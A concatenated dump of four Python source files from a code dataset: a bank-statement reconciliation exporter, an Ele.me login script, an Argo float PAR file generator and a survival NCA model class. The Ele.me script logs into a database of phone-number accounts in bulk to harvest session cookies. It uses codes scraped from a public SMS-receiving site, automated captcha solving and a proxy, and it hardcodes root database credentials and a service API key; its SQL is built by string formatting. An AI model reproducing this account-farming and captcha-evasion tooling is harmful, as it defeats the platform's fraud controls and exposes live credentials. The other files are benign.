ceb_bidbond['支出'].sum()-ceb_bidbond['收入'].sum()\r\n\r\n ceb_bidbond_ = self.ceb[purpose_cond1]\r\n ceb_sum_ = ceb_bidbond_['支出'].sum()-ceb_bidbond_['收入'].sum()\r\n \r\n if nc_bidbond['贷方'].sum() == ceb_sum:\r\n self.nc_ceb.loc[nc_bidbond.index,'对账一致'] = 'yes'\r\n self.ceb.loc[ceb_bidbond.index,'对账一致'] = 'yes'\r\n self.nc_ceb.loc[nc_bidbond.index,'银行索引'] = ';'.join(map(str,ceb_bidbond.index.values))\r\n self.ceb.loc[ceb_bidbond.index,'NC索引'] = ';'.join(map(str,nc_bidbond.index.values))\r\n\r\n elif nc_bidbond['贷方'].sum() == ceb_sum_:\r\n self.nc_ceb.loc[nc_bidbond.index,'对账一致'] = 'yes'\r\n self.ceb.loc[ceb_bidbond_.index,'对账一致'] = 'yes'\r\n self.nc_ceb.loc[nc_bidbond.index,'银行索引'] = ';'.join(map(str,ceb_bidbond_.index.values))\r\n self.ceb.loc[ceb_bidbond_.index,'NC索引'] = ';'.join(map(str,nc_bidbond.index.values))\r\n\r\n def export_excel(self):\r\n nc_rows_counts = self.nc_ceb['对账一致'].value_counts(dropna=False)\r\n ceb_rows_counts = self.ceb['对账一致'].value_counts(dropna=False)\r\n\r\n try:\r\n nc_yes_rows = nc_rows_counts['yes']\r\n except KeyError:\r\n nc_yes_rows = 0\r\n nc_notmatch_rows = nc_rows_counts.sum()-nc_yes_rows\r\n\r\n try:\r\n ceb_yes_rows = ceb_rows_counts['yes']\r\n except KeyError:\r\n ceb_yes_rows = 0\r\n ceb_notmatch_rows = ceb_rows_counts.sum()-ceb_yes_rows\r\n \r\n\r\n print('\\n')\r\n print(\"+--------------------------------------------------+\")\r\n print(\"¦ RESULTS ¦\")\r\n print(\"+--------------------------------------------------+\")\r\n print(\"¦ EXCEL ¦ NC_CEB ¦ CEB ¦\")\r\n print(\"+--------------------------------------------------+\")\r\n print(\"¦ TOTAL ¦{0:^18}¦{1:^20}¦\".format(nc_rows_counts.sum(),ceb_rows_counts.sum()))\r\n print(\"+--------------------------------------------------+\")\r\n print(\"¦ MATCH ¦{0:^18}¦{1:^20}¦\".format(nc_yes_rows,ceb_yes_rows))\r\n print(\"+--------------------------------------------------+\")\r\n print(\"¦ NOTMATCH ¦{0:^18}¦{1:^20}¦\".format(nc_notmatch_rows,ceb_notmatch_rows))\r\n print(\"+--------------------------------------------------+\")\r\n print('\\n')\r\n\r\n\r\n self.nc_ceb['交易日期'] = self.nc_ceb['交易日期'].astype(str).str.slice(0,10)\r\n self.ceb['交易日期'] = self.ceb['交易日期'].astype(str).str.slice(0,10)\r\n\r\n \r\n save_file = self.save_path + '\\\\' + self.nc_file_name + '+' + self.ceb_file_name + '.xlsx'\r\n print(\"结果保存至:\\n\\t%s\\n\" %(save_file))\r\n # self.nc_ceb.to_excel(self.save_path + '/nc_ceb.xlsx')\r\n # self.ceb.to_excel(self.save_path + '/ceb.xlsx')\r\n writer = pd.ExcelWriter(save_file,engine='xlsxwriter')\r\n self.nc_ceb.to_excel(writer,sheet_name=self.nc_file_name,startrow=1,startcol=1,header=False,index=False)\r\n self.ceb.to_excel(writer,sheet_name=self.ceb_file_name,startrow=1,startcol=1,header=False,index=False)\r\n \r\n workbook = writer.book\r\n nc_sheet = writer.sheets[self.nc_file_name]\r\n ceb_sheet = writer.sheets[self.ceb_file_name]\r\n\r\n header_format = workbook.add_format({\r\n \"bold\":True,\r\n \"bg_color\":'#67d8ef',\r\n 'font_size':15,\r\n 'font_name':\"微软雅黑\",\r\n \"align\":'center',\r\n 'border':2,\r\n })\r\n cell_format = workbook.add_format({\r\n \"font_size\":12,\r\n \"font_name\":\"微软雅黑\",\r\n \"border\":1,\r\n \"border_color\":'#67d8ef',\r\n \"align\":\"left\",\r\n })\r\n\r\n yes_format = workbook.add_format({\r\n \"bg_color\":\"#ffff00\",\r\n \"font_size\":12,\r\n \"font_name\":\"微软雅黑\",\r\n \"border\":1,\r\n \"border_color\":'#67d8ef',\r\n \"align\":\"left\"\r\n })\r\n \r\n # nc\r\n # row format\r\n \r\n nc_rows,nc_cols = self.nc_ceb.shape\r\n for i in range(nc_rows+5):\r\n nc_sheet.set_row(i,22,cell_format)\r\n\r\n yes_index = self.nc_ceb[self.nc_ceb['对账一致']=='yes'].index+1\r\n for i in yes_index:\r\n nc_sheet.set_row(i,22,yes_format)\r\n\r\n # col format\r\n nc_sheet.set_column(0,nc_cols+5,22)\r\n\r\n nc_sheet.write_row('B1',self.nc_ceb.columns,header_format)\r\n nc_sheet.write_column('A2',self.nc_ceb.index,header_format)\r\n nc_sheet.freeze_panes(1,1)\r\n nc_sheet.set_tab_color('#FF9900')\r\n\r\n #ceb\r\n # row format\r\n ceb_rows,ceb_cols = self.ceb.shape\r\n for i in range(ceb_rows+5):\r\n ceb_sheet.set_row(i,22,cell_format)\r\n\r\n yes_index = self.ceb[self.ceb['对账一致']=='yes'].index+1\r\n for i in yes_index:\r\n ceb_sheet.set_row(i,22,yes_format)\r\n\r\n # col format\r\n ceb_sheet.set_column(0,ceb_cols+5,22)\r\n\r\n ceb_sheet.write_row('B1',self.ceb.columns,header_format)\r\n ceb_sheet.write_column('A2',self.ceb.index,header_format)\r\n ceb_sheet.freeze_panes(1,1)\r\n ceb_sheet.set_tab_color('#FF9900')\r\n\r\n writer.save()\r\n\r\n\r\n\r\n def doall(self):\r\n self.rec_loans()\r\n self.prepay_firmamount()\r\n self.pay_reimburse()\r\n self.pay_loans()\r\n self.pay_bidbond()\r\n\r\n\r\n self.export_excel()\r\n\r\n def __call__(self):\r\n return self.doall()","sub_path":"projects/AutoRecon/reconciliationCEB.py","file_name":"reconciliationCEB.py","file_ext":"py","file_size_in_byte":19252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"51598526","text":"import requests\nimport time\nfrom bs4 import BeautifulSoup\nimport traceback\nimport re\nimport sqlite3\nimport pymysql\nfrom PIL import Image\nimport base64\n\n# 查询饿了么账号库未登录账号,手动输入验证码进行获取sid\n\nHEADERS = {\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49'\n ' Mobile MQQBrowser/6.2 TBS/043221 Safari/537.36 V1_AND_SQ_7.0.0_676_YYB_D QQ/7.0.0.3135 NetType/WIFI WebP/0.3.0 Pixel/1080'\n}\nproxy = '27.152.90.115:9999'\nproxies = {\n 'http': 'http://' + proxy,\n 'https': 'https://' + proxy\n}\nis_input = True\n\nconn = pymysql.connect(host='122.51.67.37', user='root', password='mm123456', port=3306, db='eleme')\ncursor = conn.cursor()\n\ndef mobile_send_code(mobile, sms_url): # 输入手机号,获取短息验证码\n dict = {\"scf\": \"ms\", \"mobile\": \"{}\".format(mobile)}\n mobile_send_code_url = 'https://h5.ele.me/restapi/eus/login/mobile_send_code'\n try:\n r = requests.post(mobile_send_code_url, headers=HEADERS, data=dict, timeout=25,)\n if r.status_code == 400 and r.json()['message'] == '账户存在风险,需要图形验证码':\n while True:\n result = captcha_yz(mobile)\n if result['status'] == 0:\n # 死循环,直到图形验证码出入正确为止\n if result['message'].status_code == 400 and result['message'].json()['message'] == '图形验证码错误':\n print('[{}]{},请重新输入'.format(mobile, result['message'].json()['message']))\n time.sleep(5)\n elif result['message'].status_code == 200 and 'validate_token' in result['message'].json():\n print('[{}]验证码校验成功,短信已发送,请查看手机验证码'.format(mobile))\n # time.sleep(15) # 延迟15秒,确保短信已接收\n # result = login_by_mobile(result['message'].json()['validate_token'], mobile, sms_url,\n # )\n result = login_by_mobile_sd(result['message'].json()['validate_token'], mobile, sms_url,\n )\n return result\n else:\n result = {'status': 1, 'message': '1-获取短信验证码出错,{}'.format(\n result['message'].json())} # 这种情况一般是检测频繁操作了,后面可以在考虑这里加入代理 {\"message\":\"您的操作太快了,请明天再来吧\",\"name\":\"HERMES_CLIENT_ERROR\"} 400\n return result\n elif result['status'] == 1:\n pass\n else:\n return result\n else:\n if r.status_code == 200 and 'validate_token' in r.json():\n print('[{}]短信已发送,请查看手机验证码'.format(mobile))\n # time.sleep(40) # 延迟15秒,确保短信已接收\n # result = login_by_mobile(r.json()['validate_token'], mobile, sms_url)\n result = login_by_mobile_sd(r.json()['validate_token'], mobile, sms_url)\n return result\n else:\n result = {'status': 1, 'message': '2-获取短信验证码出错,{}'.format(r.json())}\n return result\n except:\n result = {'status': -1, 'message': 'Error :{}'.format(traceback.format_exc())}\n return result\n\ndef login_by_mobile_sd(validate_token, mobile, sms_url):\n validate_code = input(\"{} 请手动输入验证码: \".format(sms_url))\n if validate_code == 'no':\n result = {'status': -1, 'message': '取消获取'}\n return result\n print('[{}]短信验证码识别成功,验证码为{}'.format(mobile, validate_code))\n dict = {\"mobile\": \"{}\".format(mobile), \"validate_token\": \"{}\".format(validate_token),\n \"validate_code\": \"{}\".format(validate_code)}\n login_by_mobile_url = 'https://h5.ele.me/restapi/eus/login/login_by_mobile'\n r = requests.post(login_by_mobile_url, headers=HEADERS, data=dict, timeout=25)\n if r.status_code == 200:\n if 'SID' in r.cookies and 'USERID' in r.cookies:\n SID = r.cookies['SID']\n users_id = r.cookies['USERID']\n print('[{}]获取成功,新的SID为[{}],userid为[{}]'.format(mobile, SID, users_id))\n result = {'status': 0, 'sid': SID}\n cursor.execute(\n \"UPDATE eleme_id SET sid = '{}', users_id = '{}' ,is_sx = '身份信息正常' WHERE mobile = '{}'\".format(SID,\n users_id,\n mobile))\n conn.commit()\n print('[{}]新的SID已写入成功_eleme_id'.format(mobile))\n return result\n else:\n result = {'status': 1, 'message': '未找到,sid获取出错~{},{}'.format(r.text, r.cookies)}\n return result\n else:\n result = {'status': -1, 'message': '{}'.format(r.text)}\n return result\n\ndef login_by_mobile(validate_token, mobile, sms_url): # 获取到短信验证码后登录,提取最新sid(身份认证信息)\n try:\n if len(sms_url) != 0: #该变量为空的话说明不是网上的接码平台号码 需手动输入短信验证码\n print('[{}]正在获取短信验证码'.format(mobile))\n html = requests.get(sms_url, headers=HEADERS, timeout=25)\n if html.status_code == 200:\n Soup = BeautifulSoup(html.content, 'lxml')\n # print(aSoup)\n trList = Soup.find_all(name='tbody')[0].find_all(name='tr')\n if trList:\n for tr in trList:\n tdContent = tr.find_all(name='td')[2].string\n if '【饿了么】' in tdContent:\n validate_code = re.findall('验证码是(.*?),', tdContent, re.S)[0]\n print('[{}]短信验证码识别成功,验证码为{}'.format(mobile, validate_code))\n dict = {\"mobile\": \"{}\".format(mobile), \"validate_token\": \"{}\".format(validate_token),\n \"validate_code\": \"{}\".format(validate_code)}\n login_by_mobile_url = 'https://h5.ele.me/restapi/eus/login/login_by_mobile'\n r = requests.post(login_by_mobile_url, headers=HEADERS, data=dict, timeout=25)\n if r.status_code == 200:\n if 'SID' in r.cookies and 'USERID' in r.cookies:\n SID = r.cookies['SID']\n users_id = r.cookies['USERID']\n print('[{}]获取成功,新的SID为[{}],userid为[{}]'.format(mobile, SID, users_id))\n result = {'status': 0, 'sid': SID}\n cursor.execute(\n \"UPDATE eleme_id SET sid = '{}', users_id = '{}' ,is_sx = '身份信息正常' WHERE mobile = '{}'\".format(SID, users_id, mobile))\n conn.commit()\n print('[{}]新的SID已写入成功_eleme_id'.format(mobile))\n return result\n else:\n result = {'status': 1, 'message': '未找到,sid获取出错~{},{}'.format(r.text, r.cookies)}\n return result\n else:\n result = {'status': 1, 'message': '短信验证出错~{}'.format(\n r.text)} # 这种情况一般是短信验证码错误,接码网站上最新的饿了么短信不是你前15秒发的,刚好也有人用此号码接了饿了么短信\n return result\n else:\n result = {'status': 1, 'message': '未找到饿了么短信,sms链接:{}'.format(sms_url)}\n return result\n else:\n result = {'status': 1, 'message': 'trList列表为空'}\n return result\n else:\n result = {'status': 1, 'message': '接码平台地址访问出错了~{},sms链接:{}'.format(html.status_code, sms_url)}\n return result\n except:\n result = {'status': 1, 'message': 'Error: {}'.format(traceback.format_exc())}\n return result\n\ndef captcha_yz(mobile): # 获取短息验证码时出现图形验证码验证方法\n captcha_url = 'https://h5.ele.me/restapi/eus/v3/captchas'\n mobile_send_code_url = 'https://h5.ele.me/restapi/eus/login/mobile_send_code'\n captcha_dict = {\"captcha_str\": \"{}\".format(mobile)}\n try:\n r = requests.post(captcha_url, headers=HEADERS, data=captcha_dict,\n timeout=25)\n if r.status_code == 200:\n if is_input:\n captcha_hash = r.json()['captcha_hash']\n imgbase64 = r.json()['captcha_image'].split(',')[-1]\n imagedata = base64.b64decode(imgbase64)\n file = open('captcha.jpg', \"wb\")\n file.write(imagedata)\n file.close()\n img = Image.open('captcha.jpg')\n img.show()\n time.sleep(2)\n captcha = input(\"请手动输入验证码: \")\n captcha_dict1 = {\"scf\": \"ms\", \"mobile\": \"{}\".format(mobile),\n \"captcha_hash\": \"{}\".format(captcha_hash), \"captcha_value\": \"{}\".format(captcha), }\n r2 = requests.post(mobile_send_code_url, headers=HEADERS, data=captcha_dict1,\n timeout=25)\n result = {'status': 0, 'message': r2}\n return result\n else:\n captcha_hash = r.json()['captcha_hash']\n imgbase64 = r.json()['captcha_image'].split(',')[-1]\n print('[{}]正在识别验证码'.format(mobile))\n cap_url = 'http://www.damagou.top/apiv1/recognize.html'\n cap_dict = {\n 'image': imgbase64,\n 'userkey': '3079cdcefb0b4b2bad8e6e8ab7786df5',\n 'type': '1001'\n }\n cap_r = requests.post(cap_url, data=cap_dict)\n captcha = cap_r.text\n if len(captcha) == 4:\n print('[{}]验证码识别成功,验证码为:{}'.format(mobile, captcha))\n time.sleep(5)\n captcha_dict1 = {\"scf\": \"ms\", \"mobile\": \"{}\".format(mobile),\n \"captcha_hash\": \"{}\".format(captcha_hash), \"captcha_value\": \"{}\".format(captcha)}\n r2 = requests.post(mobile_send_code_url, headers=HEADERS, data=captcha_dict1,\n timeout=25)\n result = {'status': 0, 'message': r2}\n return result\n else:\n print('[{}]验证码识别错误,识别到的内容为:{}'.format(mobile, captcha))\n time.sleep(5)\n result = {'status': 1}\n return result\n else:\n result = {'status': 2, 'message': '图形验证码获取出错~{},{}'.format(r.status_code, r.text)}\n return result\n except:\n result = {'status': 2, 'message': 'Error :{}'.format(traceback.format_exc())}\n return result\n\ncursor.execute(\"select mobile, sms_url from eleme_id where is_sx = '未登录'\")\nis_sxs = cursor.fetchall()\nfor i in range(len(is_sxs)):\n print('---------本次共有{}个手机号需验证,当前为第{}个---------'.format(len(is_sxs), i+1))\n result = mobile_send_code(is_sxs[i][0], is_sxs[i][1])\n if result['status'] == 0:\n print('新sid获取成功,sid为:{}'.format(result['sid']))\n elif result['status'] == -1:\n print(result)\n else:\n print(result)\n message = result['message'].replace(\"'\", '')\n if '您的帐号存在风险,为保护您的财产安全已冻结' in message:\n cursor.execute(\n \"UPDATE eleme_id SET is_sx = '账号已被冻结', sms_url = '账号已被冻结' WHERE mobile = '{}'\".format(is_sxs[i][0]))\n conn.commit()\n else:\n cursor.execute(\n \"UPDATE eleme_id SET is_sx = '{}' WHERE mobile = '{}'\".format(message, is_sxs[i][0]))\n conn.commit()\n# print(is_sxs)","sub_path":"backup_py/wxBot/eleme/login/get_mob_identity.py","file_name":"get_mob_identity.py","file_ext":"py","file_size_in_byte":12920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636055644","text":"import argparse\ndef argument():\n parser = argparse.ArgumentParser(description = '''\n Creates superfloat files of downwelling PAR.\n Reads from Coriolis.\n ''', formatter_class=argparse.RawTextHelpFormatter)\n\n\n parser.add_argument( '--datestart','-s',\n type = str,\n required = False,\n help = '''date in yyyymmdd format''')\n parser.add_argument( '--dateend','-e',\n type = str,\n required = False,\n help = '''date in yyyymmdd format ''')\n parser.add_argument( '--outdir','-o',\n type = str,\n required = True,\n default = \"/gpfs/scratch/userexternal/gbolzon0/SUPERFLOAT/\",\n help = 'path of the Superfloat dataset ')\n parser.add_argument( '--force', '-f',\n action='store_true',\n help = \"\"\"Overwrite existing files\n \"\"\")\n parser.add_argument( '--update_file','-u',\n type = str,\n required = False,\n default = 'NO_file',\n help = '''file with updated floats''')\n return parser.parse_args()\n\nargs = argument()\n\nif (args.datestart == 'NO_data') & (args.dateend == 'NO_data') & (args.update_file == 'NO_file'):\n raise ValueError(\"No file nor data inserted: you have to pass either datastart and dataeend or the update_file\")\n\nif ((args.datestart == 'NO_data') or (args.dateend == 'NO_data')) & (args.update_file == 'NO_file'):\n raise ValueError(\"No file nor data inserted: you have to pass both datastart and dataeend\")\n\n\nfrom instruments import bio_float\nfrom commons.time_interval import TimeInterval\nfrom basins.region import Rectangle\nimport superfloat_generator\nfrom commons.utils import addsep\nimport os\nimport scipy.io.netcdf as NC\nimport numpy as np\nimport datetime\n\nclass Metadata():\n def __init__(self, filename):\n self.filename = filename\n self.status_var = 'n'\n\n\n\ndef dump_par_file(outfile, p, Pres, Value, Qc, metadata, mode='w'):\n nP=len(Pres)\n if mode=='a':\n command = \"cp %s %s.tmp\" %(outfile,outfile)\n os.system(command)\n ncOUT = NC.netcdf_file(outfile + \".tmp\" ,mode)\n\n if mode=='w': # if not existing file, we'll put header, TEMP, PSAL\n setattr(ncOUT, 'origin' , 'coriolis')\n setattr(ncOUT, 'file_origin', metadata.filename)\n PresT, Temp, QcT = p.read('TEMP', read_adjusted=False)\n PresT, Sali, QcS = p.read('PSAL', read_adjusted=False) \n ncOUT.createDimension(\"DATETIME\",14)\n ncOUT.createDimension(\"NPROF\", 1)\n ncOUT.createDimension('nTEMP', len(PresT))\n ncOUT.createDimension('nPSAL', len(PresT))\n\n ncvar=ncOUT.createVariable(\"REFERENCE_DATE_TIME\", 'c', (\"DATETIME\",))\n ncvar[:]=p.time.strftime(\"%Y%m%d%H%M%S\")\n ncvar=ncOUT.createVariable(\"JULD\", 'd', (\"NPROF\",))\n ncvar[:]=0.0\n ncvar=ncOUT.createVariable(\"LONGITUDE\", \"d\", (\"NPROF\",))\n ncvar[:] = p.lon.astype(np.float64)\n ncvar=ncOUT.createVariable(\"LATITUDE\", \"d\", (\"NPROF\",))\n ncvar[:] = p.lat.astype(np.float64)\n\n\n \n ncvar=ncOUT.createVariable('TEMP','f',('nTEMP',))\n ncvar[:]=Temp\n setattr(ncvar, 'variable' , 'TEMP')\n setattr(ncvar, 'units' , \"degree_Celsius\")\n ncvar=ncOUT.createVariable('PRES_TEMP','f',('nTEMP',))\n ncvar[:]=PresT\n ncvar=ncOUT.createVariable('TEMP_QC','f',('nTEMP',))\n ncvar[:]=QcT\n\n ncvar=ncOUT.createVariable('PSAL','f',('nTEMP',))\n ncvar[:]=Sali\n setattr(ncvar, 'variable' , 'SALI')\n setattr(ncvar, 'units' , \"PSS78\")\n ncvar=ncOUT.createVariable('PRES_PSAL','f',('nTEMP',))\n ncvar[:]=PresT\n ncvar=ncOUT.createVariable('PSAL_QC','f',('nTEMP',))\n ncvar[:]=QcS\n\n print(\"dumping par on \" + outfile, flush=True)\n par_already_existing=\"nPAR\" in ncOUT.dimensions.keys()\n if not par_already_existing : ncOUT.createDimension('nDOWNWELLING_PAR', nP)\n ncvar=ncOUT.createVariable(\"PRES_DOWNWELLING_PAR\", 'f', ('nDOWNWELLING_PAR',))\n ncvar[:]=Pres\n ncvar=ncOUT.createVariable(\"DOWNWELLING_PAR\", 'f', ('nDOWNWELLING_PAR',))\n ncvar[:]=Value\n setattr(ncvar, 'status_var' , metadata.status_var)\n setattr(ncvar, 'variable' , 'DOWNWELLING_PAR')\n setattr(ncvar, 'units' , \"microMoleQuanta/m^2/sec\")\n setattr(ncvar, 'longname' , 'Downwelling photosynthetic available radiation')\n ncvar=ncOUT.createVariable(\"DOWNWELLING_PAR_QC\", 'f', ('nDOWNWELLING_PAR',))\n ncvar[:]=Qc\n ncOUT.close()\n\n os.system(\"mv \" + outfile + \".tmp \" + outfile)\n\ndef get_outfile(p,outdir):\n wmo=p._my_float.wmo\n filename=\"%s%s/%s\" %(outdir,wmo, os.path.basename(p._my_float.filename))\n return filename\n\n\ndef par_algorithm(pCor, outfile, metadata,writing_mode):\n os.system('mkdir -p ' + os.path.dirname(outfile))\n metadata.status_var = pCor._my_float.status_var('DOWNWELLING_PAR')\n if metadata.status_var in ['A', 'D']:\n Pres, Value, Qc = pCor.read('DOWNWELLING_PAR', read_adjusted=True)\n else:\n Pres, Value, Qc = pCor.read('DOWNWELLING_PAR', read_adjusted=False)\n if Pres is None: return\n if len(Pres)<5:\n print(\"few values in Coriolis for PAR in \" + pCor._my_float.filename, flush=True)\n return\n dump_par_file(outfile, pCor, Pres, Value, Qc, metadata,mode=writing_mode)\n\nOUTDIR = addsep(args.outdir)\ninput_file=args.update_file\nif input_file == 'NO_file':\n\n TI = TimeInterval(args.datestart,args.dateend,'%Y%m%d')\n R = Rectangle(-6,36,30,46)\n\n PROFILES_COR =bio_float.FloatSelector('DOWNWELLING_PAR', TI, R)\n\n wmo_list= bio_float.get_wmo_list(PROFILES_COR)\n wmo_list.sort()\n\n\n for wmo in wmo_list:\n print(wmo, flush=True)\n Profilelist=bio_float.filter_by_wmo(PROFILES_COR, wmo)\n for ip, pCor in enumerate(Profilelist):\n outfile = get_outfile(pCor,OUTDIR)\n writing_mode=superfloat_generator.writing_mode(outfile)\n \n condition_to_write = ~superfloat_generator.exist_valid_variable('DOWNWELLING_PAR',outfile)\n if args.force: condition_to_write=True\n if not condition_to_write: continue\n\n metadata = Metadata(pCor._my_float.filename)\n par_algorithm(pCor, outfile, metadata, writing_mode)\n\n\nelse:\n INDEX_FILE=superfloat_generator.read_float_update(input_file)\n\n nFiles=INDEX_FILE.size\n\n for iFile in range(nFiles):\n timestr = INDEX_FILE['date'][iFile].decode()\n lon = INDEX_FILE['longitude' ][iFile]\n lat = INDEX_FILE['latitude' ][iFile]\n filename = INDEX_FILE['file_name'][iFile].decode()\n available_params = INDEX_FILE['parameters'][iFile].decode()\n parameterdatamode= INDEX_FILE['parameter_data_mode'][iFile].decode()\n float_time = datetime.datetime.strptime(timestr,'%Y%m%d%H%M%S')\n filename=filename.replace('coriolis/','').replace('profiles/','')\n\n if 'DOWNWELLING_PAR' in available_params:\n pCor=bio_float.profile_gen(lon, lat, float_time, filename, available_params,parameterdatamode)\n outfile = get_outfile(pCor,OUTDIR)\n writing_mode=superfloat_generator.writing_mode(outfile)\n\n metadata = Metadata(pCor._my_float.filename)\n par_algorithm(pCor, outfile, metadata, writing_mode)\n\n\n","sub_path":"Float/superfloat_par.py","file_name":"superfloat_par.py","file_ext":"py","file_size_in_byte":7698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"136289574","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 27 01:56:26 2017\n\n@author: mohamed\n\nSurvival NCA (Neighborhood Component Analysis)\n\"\"\"\n\n# Append relevant paths\nimport os\nimport sys\n\ndef conditionalAppend(Dir):\n \"\"\" Append dir to sys path\"\"\"\n if Dir not in sys.path:\n sys.path.append(Dir)\n\ncwd = os.getcwd()\nconditionalAppend(cwd)\n\nimport _pickle\nimport numpy as np\nimport tensorflow as tf\n#from scipy.io import loadmat, savemat\n#from matplotlib import cm\n#import matplotlib.pylab as plt\n\nimport logging\nimport datetime\n\nimport ProjectUtils as pUtils\nimport SurvivalUtils as sUtils\nimport DataManagement as dm\nimport NCA_graph_experimental as cgraph\n\n#raise(Exception)\n\n#%%============================================================================\n# NCAmodel class (trainable model)\n#==============================================================================\n\nclass SurvivalNCA(object):\n \n \"\"\"\n Extension of NCA to right-censored settings.\n \n Key references: \n \n 1- J Goldberger, GE Hinton, ST Roweis, RR Salakhutdinov. \n Neighbourhood components analysis. \n Advances in neural information processing systems, 513-520\n \n 2- Yang, W., K. Wang, W. Zuo. \n Neighborhood Component Feature Selection for High-Dimensional Data.\n Journal of Computers. Vol. 7, Number 1, January, 2012.\n \n \"\"\"\n \n # Set class attributes\n ###########################################################################\n \n # default graph params\n default_graphParams = {'ALPHA': 0.5,\n 'LAMBDA': 0,\n 'KAPPA': 1.0,\n 'OPTIM': 'GD',\n 'LEARN_RATE': 0.01}\n userspecified_graphParams = ['dim_input',]\n \n \n # Init\n ###########################################################################\n \n def __init__(self, \n RESULTPATH, description=\"\", \n LOADPATH = None):\n \n \"\"\"Instantiate a survival NCA object\"\"\"\n \n if LOADPATH is not None:\n \n # Load existing model\n self.load(LOADPATH)\n \n # overwrite loaded paths\n self.RESULTPATH = RESULTPATH\n \n else:\n \n # Set instance attributes\n #==================================================================\n \n self.RESULTPATH = RESULTPATH\n self.LOGPATH = self.RESULTPATH + \"model/logs/\"\n self.WEIGHTPATH = self.RESULTPATH + \"model/weights/\"\n \n # prefix to all saved results\n self.description = description\n \n # new model inital attributes\n self.Costs_epochLevel_train = []\n self.Costs_epochLevel_valid = []\n #self.Costs_batchLevel_train = []\n #self.Costs_batchLevel_valid = []\n self.BATCHES_RUN = 0\n self.EPOCHS_RUN = 0\n \n # Create output dirs\n #==================================================================\n \n self._makeSubdirs()\n \n # Configure logger - will not work with iPython\n #==================================================================\n \n timestamp = str(datetime.datetime.today()).replace(' ','_')\n logging.basicConfig(filename = self.LOGPATH + timestamp + \"_RunLogs.log\", \n level = logging.INFO,\n format = '%(levelname)s:%(message)s')\n \n \n #%%===========================================================================\n # Miscellaneous methods\n #==============================================================================\n \n # The following load/save methods are inspired by:\n # https://stackoverflow.com/questions/2345151/\n # how-to-save-read-class-wholly-in-python\n \n def save(self):\n \n \"\"\"save relevant attributes as ModelAttributes.pkl\"\"\"\n \n pUtils.Log_and_print(\"Saving relevant attributes ...\")\n\n attribs = self.getModelInfo()\n \n with open(self.RESULTPATH + 'model/' + self.description + \\\n 'ModelAttributes.pkl','wb') as f:\n _pickle.dump(attribs, f)\n \n #==========================================================================\n \n def load(self, LOADPATH):\n \n \"\"\"load ModelAttributes.pkl\"\"\"\n \n print(\"Loading model attributes ...\")\n \n with open(LOADPATH,'rb') as f:\n attribs = _pickle.load(f)\n \n # unpack dict\n self.RESULTPATH = attribs['RESULTPATH']\n self.description = attribs['description']\n self.Costs_epochLevel_train = attribs['Costs_epochLevel_train']\n self.Costs_epochLevel_valid = attribs['Costs_epochLevel_valid']\n #self.Costs_batchLevel_train = attribs['Costs_batchLevel_train']\n #self.Costs_batchLevel_valid = attribs['Costs_batchLevel_valid']\n self.BATCHES_RUN = attribs['BATCHES_RUN']\n self.EPOCHS_RUN = attribs['EPOCHS_RUN']\n self.COMPUT_GRAPH_PARAMS = attribs['COMPUT_GRAPH_PARAMS']\n self.LOGPATH = attribs['LOGPATH']\n self.WEIGHTPATH = attribs['WEIGHTPATH']\n \n #==========================================================================\n \n def getModelInfo(self):\n \n \"\"\" Returns relevant model attributes\"\"\"\n \n attribs = {\n 'RESULTPATH' : self.RESULTPATH,\n 'description' : self.description,\n 'Costs_epochLevel_train': self.Costs_epochLevel_train,\n 'Costs_epochLevel_valid': self.Costs_epochLevel_valid,\n #'Costs_batchLevel_train': self.Costs_batchLevel_train,\n #'Costs_batchLevel_valid': self.Costs_batchLevel_valid,\n 'BATCHES_RUN': self.BATCHES_RUN,\n 'EPOCHS_RUN': self.EPOCHS_RUN,\n 'COMPUT_GRAPH_PARAMS': self.COMPUT_GRAPH_PARAMS,\n 'LOGPATH': self.LOGPATH,\n 'WEIGHTPATH': self.WEIGHTPATH,\n }\n \n return attribs\n \n #==========================================================================\n \n def reset_TrainHistory(self):\n \n \"\"\"Resets training history (Costs etc)\"\"\" \n \n self.EPOCHS_RUN = 0\n self.BATCHES_RUN = 0 \n #self.Costs_batchLevel_train = [] \n #self.Costs_batchLevel_valid = []\n self.Costs_epochLevel_train = []\n self.Costs_epochLevel_valid = []\n self.save()\n \n #========================================================================== \n \n def _makeSubdirs(self):\n \n \"\"\" Create output directories\"\"\"\n \n # Create relevant result subdirectories\n pUtils.makeSubdir(self.RESULTPATH, 'plots')\n pUtils.makeSubdir(self.RESULTPATH, 'ranks')\n \n # Create a subdir to save the model\n pUtils.makeSubdir(self.RESULTPATH, 'model')\n pUtils.makeSubdir(self.RESULTPATH + 'model/', 'weights')\n pUtils.makeSubdir(self.RESULTPATH + 'model/', 'logs')\n \n \n #%%============================================================================\n # build computational graph\n #==============================================================================\n \n def _build_computational_graph(self, COMPUT_GRAPH_PARAMS={}):\n \n \"\"\" \n Build the computational graph for this model\n At least, no of dimensions ('D') must be provided\n \"\"\"\n \n # Now that the computationl graph is provided D is always fixed\n self.D = COMPUT_GRAPH_PARAMS['dim_input']\n\n # Params for the computational graph\n self.COMPUT_GRAPH_PARAMS = \\\n pUtils.Merge_dict_with_default(\\\n dict_given = COMPUT_GRAPH_PARAMS,\n dict_default = self.default_graphParams,\n keys_Needed = self.userspecified_graphParams)\n \n # instantiate computational graph\n graph = cgraph.comput_graph(**self.COMPUT_GRAPH_PARAMS)\n \n return graph\n \n \n #%%============================================================================\n # Run session \n #==============================================================================\n \n def train(self, \n features, survival, censored,\n features_valid = None, \n survival_valid = None, \n censored_valid = None,\n COMPUT_GRAPH_PARAMS={},\n BATCH_SIZE = 20,\n PLOT_STEP = 10,\n MODEL_SAVE_STEP = 10,\n MAX_ITIR = 100):\n \n \"\"\"\n train a survivalNCA model\n features - (N,D) np array\n survival and censored - (N,) np array\n \"\"\"\n \n pUtils.Log_and_print(\"Training survival NCA model.\")\n \n \n # Initial preprocessing and sanity checks\n #====================================================================== \n \n pUtils.Log_and_print(\"Initial preprocessing.\")\n \n assert len(features.shape) == 2\n assert len(survival.shape) == 1\n assert len(censored.shape) == 1\n \n 